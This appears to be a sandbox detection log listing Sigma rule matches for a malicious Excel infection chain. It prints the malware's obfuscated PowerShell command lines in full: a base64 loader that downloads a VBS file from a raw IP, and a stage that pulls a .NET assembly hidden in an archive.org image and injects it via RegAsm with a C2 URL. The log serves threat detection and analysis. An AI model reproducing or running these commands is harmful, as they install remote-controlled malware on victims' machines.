                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICA
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3564, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3852, ProcessName: mshta.exe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3968, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS" , ProcessId: 2632, ProcessName: wscript.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21t
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3968, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline", ProcessId: 4088, ProcessName: csc.exe
                    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3564, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3968, TargetFilename: C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rqgexaaqlwosdbspgszm", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rqgexaaqlwosdbspgszm", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3592, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rqgexaaqlwosdbspgszm", ProcessId: 3888, ProcessName: RegAsm.exe
                    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3564, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 443
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3968, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS" , ProcessId: 2632, ProcessName: wscript.exe
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3968, TargetFilename: C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3564, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgI